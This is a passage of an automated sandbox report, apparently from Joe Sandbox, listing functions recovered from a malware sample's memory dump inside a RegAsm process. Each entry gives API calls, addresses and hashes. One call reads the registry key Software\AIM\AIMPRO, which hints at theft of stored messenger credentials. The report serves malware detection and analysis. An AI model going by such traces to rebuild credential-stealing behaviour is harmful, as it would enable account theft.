                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2578913611-0
                                                                                                                                                                                                                      • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                                                                                                                                      • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
                                                                                                                                                                                                                      Function 00410D6F Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?,004066D9), ref: 00410D78
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?), ref: 00410D80
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentDirectoryFreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2760881011-0
                                                                                                                                                                                                                      • Opcode ID: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                                                                                                      • Instruction ID: c686a64e774c0d910729c20308bd6d7dac36cbeeda648e68b024901bbde96cda
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DC00239000A01DFD7219FA0E808BE5BBF4BF48342FA8496DE1C581064E7799594CF48
                                                                                                                                                                                                                      Function 00404CE0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                                                                                                                                      • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
                                                                                                                                                                                                                      Function 00412111 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                      • Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                                                                                                                                                                                                      • Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605
                                                                                                                                                                                                                      Function 00407930 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                      • Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                                                                                                                                                                                                      • Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04
                                                                                                                                                                                                                      Function 00411D68 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                                                                                                                                      • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57